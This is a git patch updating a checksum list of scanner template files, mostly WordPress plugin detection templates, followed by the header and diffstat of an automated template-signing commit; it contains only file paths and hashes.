+http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 +http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 +http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 +http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 +http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 +http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 +http/technologies/wordpress/plugins/meta-box.yaml:285b1f97492cb199c5f4b4bcc5a6dd7ec2c24211 +http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e +http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 +http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d +http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 +http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 +http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 +http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 +http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 +http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 +http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:91e65eb83d9a0ad660a521bbcd2b45baa97f1e04 -http/technologies/wordpress/plugins/pixelyoursite.yaml:0032e62386392f1ec33d4650ef1110550fd49f58 -http/technologies/wordpress/plugins/polylang.yaml:6319c1dc6bf0a42da833b930d821950c0784326f +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb +http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 +http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:018758a8e06267d93cc89d66ba339c1abcd3b3ac -http/technologies/wordpress/plugins/post-smtp.yaml:7221f5af421df4feb8c7a7c2ce138b58826d6dc1 -http/technologies/wordpress/plugins/post-types-order.yaml:80a5974b0d5afa2afb96d0c90a5684d7a797154c -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:abd1784931faaedea69d33d90130d87251962f98 -http/technologies/wordpress/plugins/pretty-link.yaml:ff281c281dab24b7b96f4822e8e9a4b518dd4578 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:9353485af1db0bdc92859c4de5ac13789fe4d4ff -http/technologies/wordpress/plugins/really-simple-ssl.yaml:daf3fbc5e3a81f76e2a54019e2211695a4549a69 -http/technologies/wordpress/plugins/redirection.yaml:6e1eac8324bae4af89f18d9613b908e00b92057f -http/technologies/wordpress/plugins/redux-framework.yaml:6805534d49e6551b5f0be21b90bd519e6d0ab8da -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:aeaaabcacc11148d82ec0f005aed5332d280b867 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:a3294aaac3a15aa1a54e92cab40d416a47dff4a0 -http/technologies/wordpress/plugins/safe-svg.yaml:a0a860d3a523f3f5cc23093b66e2acdd6f080824 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:4172e3c955d9bcd8d47a5cc8f1adccd5be604528 -http/technologies/wordpress/plugins/sg-cachepress.yaml:fe7b2fc119762e1fcfb42ac0922010a9ff20263d -http/technologies/wordpress/plugins/sg-security.yaml:e7e75314776e62c5134a6f4300bd0e22704dbb6e -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:a0124a9cc1d22bfb27758bf03cbcbe56a031d898 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:9fda73e9f5cb16a65951e02317fb9a7cd8bf77ce -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:620cb7d928cbafb835f676d1d66705c1d62d33ec -http/technologies/wordpress/plugins/simple-history.yaml:528df8c4ca069963f68b2b6dbf38580485c67f48 +http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 +http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 +http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c +http/technologies/wordpress/plugins/pretty-link.yaml:9babdd01d2c338a5f22e1e684a3d2a6b82424668 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc +http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 +http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 +http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d +http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 +http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad +http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:ebe901f5b6f54262accd615c484ea2e0c239009a -http/technologies/wordpress/plugins/siteorigin-panels.yaml:2a77adfec3d088ae8c5653d0c424777f2559bc5a -http/technologies/wordpress/plugins/smart-slider-3.yaml:8c0dc104ab8a9c636d77efc1c816e7b91d9b8554 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:c245de4fd7992c7a1fbca1ce3cfb01d78287c3c4 +http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead +http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:9c018bfe47c5468ef3acd6c5590daed0305b1905 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:374734558d6d0e22f39a745af2c0daad25a78bd5 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:5858e4cdd2c8e374674d8dabd0bdb67da4668ae7 -http/technologies/wordpress/plugins/svg-support.yaml:693041cc9600edfb1355b50942171d3a6bd8b3f5 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:f9a788863bce606fc13b2176c63dedaa07873962 -http/technologies/wordpress/plugins/tablepress.yaml:e515cef2003c217a9b15e2e4e20b6bc1dec28253 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:2504dc259b44711bcad9649c8d03271835e9d989 -http/technologies/wordpress/plugins/templately.yaml:dfef351d401cc7d6469034323560a3cf4fdf62ad -http/technologies/wordpress/plugins/the-events-calendar.yaml:e07d07b05a0856d428459e3e477a04002cbceba2 +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e +http/technologies/wordpress/plugins/svg-support.yaml:9e209af3c91abf6ba27d6d2b49ddf7196dc91450 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 +http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 +http/technologies/wordpress/plugins/templately.yaml:2b4d2d3c2706a8736bd848f882e18bb587689859 +http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:a8389846673703237052302353bf6754f5f268e8 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:a794c46322c0546ef5749d9a18b93d02dbc3ba5b -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:4d9b800e1d26e3ffeb5ee6824c9e524484f20d3f -http/technologies/wordpress/plugins/under-construction-page.yaml:7e71e4bd0b182ced1fa7c9938ed0b6f4b268525d +http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 +http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:baff7df8ed1e650904310f02189167dbf4751ee9 +http/technologies/wordpress/plugins/updraftplus.yaml:ca4d717fe515b7eb6536411561bb5541b05681fa http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:763b59b75c557626ea455832ed2cc49f8d1f83d7 +http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:4a43103463061988800a27f1b3e73467bd307130 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:aff6d250c1d23b253d9b8221c3091b7dd044e0d2 -http/technologies/wordpress/plugins/webp-express.yaml:3bb82b5cb3cc246a5580178c2fb18dd24e07c412 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:381b792b37c578f9be179952bcf0cab891d4356a -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:67f382d5ec9bcb231fdf08d9fec36fa79b594377 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:242408c6c45b2d271f5a74a6eff0d0828f9fffd6 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:6e414dcb5d95970f6a57ecce647c649556775160 +http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 +http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:ccf52d66ac24a3308436ebcb577f2ad04b256c4d -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:12880567b4cc0eaa42168efed487d48c031c0b38 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:43f08a486a0284f2eaa2193b2c015d0443db7b75 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:f51de8be03264f0d385f7dbe9609a3907cc67943 -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:6c03a96c8c315f6a946022bf064371141253c667 -http/technologies/wordpress/plugins/woocommerce-services.yaml:4c23784532bd1fcca9db44197f33f65bdb325b13 -http/technologies/wordpress/plugins/woocommerce.yaml:3d679700538235e1ab1fddd8a10832b87d99e5de -http/technologies/wordpress/plugins/wordfence.yaml:9313762d064153f5fd2b942f6af7dc4a5d328914 -http/technologies/wordpress/plugins/wordpress-importer.yaml:b88a74e59146b7d59a506d1238f6921b4f494f2b -http/technologies/wordpress/plugins/wordpress-seo.yaml:f6f0883e726d791e49658c74207bce56ff92bb49 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:b2a01f711495d5a37d201b510a6487ae816dab9b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b +http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 +http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f +http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b +http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f +http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:0fe262b5b760ef65a9d621235e1ee42ab1f212fa -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:a5c35a9562749e5fe13679ef6a81d2424dadddd8 -http/technologies/wordpress/plugins/wp-file-manager.yaml:6068bf69fe4797338e246bfabb8d3886abeaa3db -http/technologies/wordpress/plugins/wp-google-maps.yaml:d1f4807f1738488caa2962f7d4c82ddbbbfe7098 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:f43ca4da9616e8963b5986439389569746b85e78 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:9eedc8bfc3a584e5b47b95b5423570a168f34997 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:8769d90b6a61ff1127cd6a424fa5f64f2aebae19 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:f544677cf09564c9e3d2bfe921af13e25b4c57fe -http/technologies/wordpress/plugins/wp-optimize.yaml:a7e14e3639508ba4756aef6fa1fc9a1b6fbe1a99 -http/technologies/wordpress/plugins/wp-pagenavi.yaml:5a0831e3488346b3f7af19d4858ff9729353ddd9 -http/technologies/wordpress/plugins/wp-reset.yaml:998a493c3b21aed41ace4b1b4ff1ae7421dbe4a7 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:7dd4ebe8dbecfaa4f82c7fec006ae7ae6a3f7438 -http/technologies/wordpress/plugins/wp-rollback.yaml:631d11fad5e13a2e4a494e6b27005751256ae7da -http/technologies/wordpress/plugins/wp-seopress.yaml:4d32ae46b97e6e5b0ecd787687cceb3e97edb686 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:28ac0299492e1fd07a1bae1f753402366f45ccd4 -http/technologies/wordpress/plugins/wp-smushit.yaml:e94bf5e149cec24c820ac6e804f137f87e85d6b4 -http/technologies/wordpress/plugins/wp-statistics.yaml:b11396290ac16df9d0b4058c3040ba421df72972 -http/technologies/wordpress/plugins/wp-super-cache.yaml:42212a8062392bbd4cf3455332e93584a01c162c +http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 +http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 +http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 +http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 +http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc +http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca +http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 +http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb +http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b +http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:bbdec57ee0328ab628227dca5fd4034fb6279a03 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:cb841859ebb348f9a2c8d41197d66098e2b81fa4 -http/technologies/wordpress/plugins/wpforms-lite.yaml:2095d1b65c74556a1fb50461be288ce07acd69a9 -http/technologies/wordpress/plugins/wps-hide-login.yaml:4fccef8bfa03a2b521fcbf987742a8e96796aef4 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:debc9ae1742ec04ea7b518634e80f932c0fc09a3 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 +http/technologies/wordpress/plugins/wpforms-lite.yaml:1fcff3d3b881c0f9dcf700cf7751c5297ee289ce +http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:b4e27de7fbc0653ddbc77ea7ade813fb9b37b391 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8791,7 +8791,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e88f55bf04da857cf09ef5283eb77403bc91a523 +templates-checksum.txt:fb4239ebca46c2f3a57537e10322c98fb566b2c0 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 0f607804952cc5972a60bd7ab6765a1c371a0b60 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 27 Jun 2024 09:37:56 +0000 Subject: [PATCH 0662/1841] Auto Template Signing [Thu Jun 27 09:37:56 UTC 2024] :robot: --- http/cves/2024/CVE-2024-34102.yaml | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + .../wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/image-optimization.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/iwp-client.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + 